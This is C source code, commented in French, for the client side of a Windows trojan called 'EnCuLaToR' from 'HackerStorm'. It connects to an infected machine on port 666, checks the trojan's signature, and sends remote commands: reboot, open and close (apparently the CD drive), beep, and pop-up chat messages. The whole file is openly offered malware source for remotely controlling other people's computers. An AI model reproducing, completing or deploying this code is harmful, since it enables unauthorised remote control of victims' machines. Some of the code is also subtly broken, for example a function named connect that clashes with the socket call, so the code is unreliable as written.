

//----------------------------------------------------------------------
//
// EnCuLaToR TroYaN par TiPiaX - HackerStorm
// Client part
// Il faut d'abord crer un fichier de resource avec une boite de dialogue
// IDD_DIALOG, un bouton IDC_REBOOT, un bouton IDC_CONNECT, une
// editbox IDC_IP et un label IDC_STATUS
//
//----------------------------------------------------------------------

#include <windows.h>   // Le include de base de tout programme Windows
#include "resource.h"  // Le fichier ressource que Visual C++ a cre pour nous
#include <stdio.h>

char ip[20];
char buf[100]; //buffer pour recevoir des datas
char signature[]="EnCuLaToR v0.1\r\n";
int comparaison;
int recu = 1;

SOCKET   s;
WSADATA  wsaData;
WORD     verreq;
struct   sockaddr_in sin;
int len = sizeof(SOCKADDR_IN);

char message[]="reboot\r\n";
char open[]="open\r\n";
char close[]="close\r\n";
char beep[]="beep\r\n";
char chat[]="chat\r\n";
char parole[100];
char titre[100];

char noco[]="Pas de connection";


HINSTANCE  hInst   = NULL;   // Variable pour contenir l'instance de notre programme
HWND	   hwnd    = NULL;

LRESULT CALLBACK DlgProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam);
LRESULT CALLBACK DlgProc2(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam);

int connect(char Fip[],HWND hWnd);
	
// Le gestionnaire d'vnements pour notre bote de dialogue
LRESULT CALLBACK DlgProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam)  
{
	switch(msg)
	{
	case WM_COMMAND: 
		{                                                       
			switch(LOWORD(wParam))
			{
				case IDC_CONNECT:
					{
						GetDlgItemText(hwnd,IDC_IP,ip,20);
						closesocket(s);
						connect(ip,hwnd);
						break;
					}

				case IDC_REBOOT:
					{
						if(send(s,message,sizeof(message),0)==-1)
							SetDlgItemText(hwnd,IDC_STATUS,noco);
						break;
					}
				case IDC_OPEN:
					{
						if(send(s,open,sizeof(open),0)==-1)
							SetDlgItemText(hwnd,IDC_STATUS,noco);
						break;
					}
				case IDC_CLOSE:
					{
						if(send(s,close,sizeof(close),0)==-1)
							SetDlgItemText(hwnd,IDC_STATUS,noco);
						break;
					}
				case IDC_BEEP:
					{
						if(send(s,beep,sizeof(beep),0)==-1)
							SetDlgItemText(hwnd,IDC_STATUS,noco);
						break;
					}
				case IDC_CHAT:
					{
						DialogBox(hInst,MAKEINTRESOURCE(IDD_DIALOG2),NULL,(DLGPROC) DlgProc2);
						break;
					}



				case WM_DESTROY:
					{
						closesocket(s);
						WSACleanup();
						ExitProcess(0);
						break;
					}

			}
			break;
		}


	case WM_INITDIALOG:
		{
			SetDlgItemText(hwnd,IDC_STATUS,"Pas de connection");
			SetDlgItemText(hwnd,IDC_IP,"127.0.0.1");
			break;
		}


		default: 	
		return FALSE;
     }
     return TRUE; 
}

LRESULT CALLBACK DlgProc2(HWND Hwnd, UINT msg, WPARAM wParam, LPARAM lParam)  
{
	switch(msg)
	{
	case WM_COMMAND: 
		{                                                       
			switch(LOWORD(wParam))
			{
				case IDC_SEND:
					{	
						GetDlgItemText(Hwnd,IDC_TITRE,titre,100);
						GetDlgItemText(Hwnd,IDC_TEXTE,parole,100);
						if(send(s,chat,sizeof(chat),0)==-1)
						SetDlgItemText(hwnd,IDC_STATUS,noco);
						if(send(s,titre,sizeof(titre),0)==-1)
						SetDlgItemText(Hwnd,IDC_STATUS,noco);
						if(send(s,parole,sizeof(parole),0)==-1)
						SetDlgItemText(Hwnd,IDC_STATUS,noco);
						break;
					}
					
				case WM_DESTROY:
					{
						EndDialog(Hwnd,FALSE);
						break;
					}

			}
			break;
		}
		default: 	
		return FALSE;
     }
     return TRUE; 
}

int WINAPI WinMain(			
     HINSTANCE hInstance,	// handle sur l'instance prsente
     HINSTANCE hPrevInst,	// handle sur l'instance prcdente (Win 3.1, obsolte)
     LPSTR lpCmdLine,		// ptr sur la ligne de commande (ie: argv[], argc)
     int nCmdShow)		// l'tat de la fentre

{

	hInst = hInstance; 
	// Activer la bote de dialogue
    DialogBox(hInst, MAKEINTRESOURCE(IDD_DIALOG), NULL, ( DLGPROC ) DlgProc);
  
    return (0);
}


//** connection **//

int connect(char Fip[],HWND hWnd)
{


	//initialisation du systme de sockets:
	verreq=MAKEWORD(2,2);
	WSAStartup(verreq,&wsaData);

	//remplissage de la structure sockaddr_in
	sin.sin_family=AF_INET;
	sin.sin_addr.s_addr=inet_addr(Fip);
	sin.sin_port=htons(666);

	s = socket(PF_INET, SOCK_STREAM, 0);

	if (connect(s,(struct sockaddr *)&sin,len)==SOCKET_ERROR)
	{
		SetDlgItemText(hWnd,IDC_STATUS,"Erreur lors de la connection");
		goto error;
	}

	SetDlgItemText(hWnd,IDC_STATUS,"Attente de la signature");
	//check la signature du troyan

	recu = recv(s,buf,sizeof(buf),0);
	if (recu==0) {SetDlgItemText(hWnd,IDC_STATUS,"Connection perdue");goto error;}

	comparaison = lstrcmp(buf,signature);
	if (comparaison==0){SetDlgItemText(hWnd,IDC_STATUS,"Connect !!!");}
	else {SetDlgItemText(hWnd,IDC_STATUS,"Pas de connection");goto error;}
	return (0);

//	send(s,hello,strlen(hello),0);
error:
	int nombre;
	char buffer[30];
	nombre=WSAGetLastError();
	sprintf(buffer,"%d",nombre);
	MessageBox(NULL,buffer,"ERROR : WSAGetLastError :",MB_OK);
	closesocket(s);
	WSACleanup();

return (0);
}